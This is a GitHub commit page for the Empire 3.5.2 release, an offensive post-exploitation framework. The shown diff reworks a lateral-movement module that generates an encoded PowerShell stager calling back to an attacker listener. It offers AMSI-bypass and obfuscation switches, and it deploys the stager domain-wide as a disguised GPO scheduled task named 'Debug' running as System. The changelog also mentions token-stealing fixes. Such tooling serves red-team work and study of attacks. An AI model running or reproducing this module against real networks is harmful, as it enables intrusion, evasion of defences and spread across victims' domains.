Skip to content

Commit

Permalink
Merge pull request #363 from BC-SECURITY/dev
Browse files Browse the repository at this point in the history 
Empire 3.5.2 Release
  • Loading branch information
@Cx01N
Cx01N committed Oct 22, 2020
2 parents cc18b46 + 1db80af commit 01b073d
Show file tree
Hide file tree
Showing 7 changed files with 620 additions and 260 deletions.
2 changes: 1 addition & 1 deletion VERSION
View file
Original file line number Diff line number Diff line change
@@ -1 +1 @@
3.5.1
3.5.2
7 changes: 7 additions & 0 deletions changelog
View file
Original file line number Diff line number Diff line change
@@ -1,3 +1,10 @@
10/22/2020
------------
- Version 3.5.2 Master Release
- Fixed token manipulation (steal_token) functionality in Windows 10 - #355 (@Hubbl3)
- Fixed lateral movement module New-GPOImmediateTask - #362 (@Cx01N)
- Fixed Invoke-PSRemoting blocking current agent - #359 (@mjokic)

10/14/2020
------------
- Version 3.5.1 Master Release
Expand Down
205 changes: 42 additions & 163 deletions data/module_source/credentials/Invoke-TokenManipulation.ps1
View file

Large diffs are not rendered by default.

451 changes: 451 additions & 0 deletions data/module_source/situational_awareness/network/powerview.ps1
View file

Large diffs are not rendered by default.

2 changes: 1 addition & 1 deletion lib/common/empire.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -18,7 +18,7 @@

from flask_socketio import SocketIO

VERSION = "3.5.1 BC Security Fork"
VERSION = "3.5.2 BC Security Fork"

from pydispatch import dispatcher

Expand Down
2 changes: 1 addition & 1 deletion lib/modules/powershell/lateral_movement/invoke_psremoting.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -21,7 +21,7 @@ def __init__(self, mainMenu, params=[]):

'Techniques': ['T1028'],

'Background' : False,
'Background' : True,

'OutputExtension' : None,

Expand Down
211 changes: 117 additions & 94 deletions lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -21,18 +21,18 @@ def __init__(self, mainMenu, params=[]):

'Techniques': ['T1053'],

'Background' : True,
'Background': True,

'OutputExtension' : None,

'NeedsAdmin' : False,
'OutputExtension': None,

'OpsecSafe' : True,

'Language' : 'powershell',
'NeedsAdmin': False,

'OpsecSafe': True,

'Language': 'powershell',

'MinLanguageVersion': '2',

'MinLanguageVersion' : '2',

'Comments': [
'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
]
Expand All @@ -42,70 +42,90 @@ def __init__(self, mainMenu, params=[]):
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'TaskName' : {
'Description' : 'Name for the schtask to create.',
'Required' : True,
'Value' : 'Debug'
},
'TaskDescription' : {
'Description' : 'Name for the schtask to create.',
'Required' : False,
'Value' : 'Debugging functionality.'
},
'TaskAuthor' : {
'Description' : 'Name for the schtask to create.',
'Required' : True,
'Value' : 'NT AUTHORITY\System'
},
'GPOname' : {
'Description' : 'The GPO name to build the task for.',
'Required' : False,
'Value' : ''
},
'GPODisplayName' : {
'Description' : 'The GPO display name to build the task for.',
'Required' : False,
'Value' : ''
},
'Domain' : {
'Description' : 'The domain to query for the GPOs, defaults to the current domain.',
'Required' : False,
'Value' : ''
},
'DomainController' : {
'Description' : 'Domain controller to reflect LDAP queries through.',
'Required' : False,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Remove' : {
'Description' : 'Switch. Remove the immediate schtask.',
'Required' : False,
'Value' : 'default'
'Agent': {
'Description': 'Agent to run module on.',
'Required': True,
'Value': ''
},
'TaskName': {
'Description': 'Name for the schtask to create.',
'Required': True,
'Value': 'Debug'
},
'TaskDescription': {
'Description': 'Name for the schtask to create.',
'Required': False,
'Value': 'Debugging functionality.'
},
'TaskAuthor': {
'Description': 'Name for the schtask to create.',
'Required': True,
'Value': 'NT AUTHORITY\System'
},
'GPOname': {
'Description': 'The GPO name to build the task for.',
'Required': False,
'Value': ''
},
'GPODisplayName': {
'Description': 'The GPO display name to build the task for.',
'Required': False,
'Value': ''
},
'Domain': {
'Description': 'The domain to query for the GPOs, defaults to the current domain.',
'Required': False,
'Value': ''
},
'DomainController': {
'Description': 'Domain controller to reflect LDAP queries through.',
'Required': False,
'Value': ''
},
'Listener': {
'Description': 'Listener to use.',
'Required': True,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Remove': {
'Description': 'Switch. Remove the immediate schtask.',
'Required': False,
'Value': 'default'
},
'Obfuscate': {
'Description': 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required': False,
'Value': 'False'
},
'ObfuscateCommand': {
'Description': 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required': False,
'Value': r'Token\All\1'
},
'AMSIBypass': {
'Description': 'Include mattifestation\'s AMSI Bypass in the stager code.',
'Required': False,
'Value': 'True'
},
'AMSIBypass2': {
'Description': 'Include Tal Liberman\'s AMSI Bypass in the stager code.',
'Required': False,
'Value': 'False'
}
}

Expand All @@ -119,19 +139,17 @@ def __init__(self, mainMenu, params=[]):
if option in self.options:
self.options[option]['Value'] = value


def generate(self, obfuscate=False, obfuscationCommand=""):

# Set booleans to false by default
Obfuscate = False
AMSIBypass = False
AMSIBypass2 = False
moduleName = self.info["Name"]
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']

module_name = self.info["Name"]
listener_name = self.options['Listener']['Value']
user_agent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
proxy_creds = self.options['ProxyCreds']['Value']
if (self.options['Obfuscate']['Value']).lower() == 'true':
Obfuscate = True
ObfuscateCommand = self.options['ObfuscateCommand']['Value']
Expand All @@ -140,52 +158,57 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
if (self.options['AMSIBypass2']['Value']).lower() == 'true':
AMSIBypass2 = True

if not self.mainMenu.listeners.is_listener_valid(listenerName):
if not self.mainMenu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
print(helpers.color("[!] Invalid listener: " + listenerName))
print(helpers.color("[!] Invalid listener: " + listener_name))
return ""

else:

# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, obfuscate=Obfuscate, obfuscationCommand=ObfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, AMSIBypass=AMSIBypass, AMSIBypass2=AMSIBypass2)
launcher = self.mainMenu.stagers.generate_launcher(listener_name, language='powershell', encode=True,
obfuscate=Obfuscate, obfuscationCommand=ObfuscateCommand,
userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds,
AMSIBypass=AMSIBypass, AMSIBypass2=AMSIBypass2)

command = "/c \""+launcher+"\""
command = "/c \"" + launcher + "\""

if command == "":
return ""

else:

# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
module_source = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
f = open(module_source, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
print(helpers.color("[!] Could not read module source path at: " + str(module_source)))
return ""

moduleCode = f.read()
module_code = f.read()
f.close()

# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script = helpers.generate_dynamic_powershell_script(module_code, module_name)

script = moduleName + " -Command cmd -CommandArguments '"+command+"' -Force"
script = module_name + " -Command cmd -CommandArguments '" + command + "' -Force"

for option,values in self.options.items():
if option.lower() in ["taskname", "taskdescription", "taskauthor", "gponame", "gpodisplayname", "domain", "domaincontroller"]:
for option, values in self.options.items():
if option.lower() in ["taskname", "taskdescription", "taskauthor", "gponame", "gpodisplayname",
"domain", "domaincontroller"]:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " '" + str(values['Value']) + "'"

script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
script += ' | Out-String | %{$_ + \"`n\"};"`n' + str(module_name) + ' completed!"'

if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script,
obfuscationCommand=obfuscationCommand)
script = helpers.keyword_obfuscation(script)

return script

0 comments on commit 01b073d

Please sign in to comment.